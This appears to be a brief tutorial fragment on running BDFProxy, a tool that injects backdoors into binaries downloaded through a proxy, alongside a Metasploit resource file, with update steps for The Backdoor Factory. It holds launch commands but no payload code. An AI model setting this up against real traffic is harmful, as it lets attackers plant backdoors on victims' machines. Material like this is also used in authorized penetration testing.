How to run it :

nano bdfproxy.cfg

*change the settings when necessary

./bdf_proxy.py

msfconsole -r bdfproxy_msf_resource.rc



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/the-backdoor-factory
sudo ./update.sh

cd ~/arsenal/BDFProxy
sudo ./update.sh



Reference

See also : Metaspolit Framework


That's all! See you.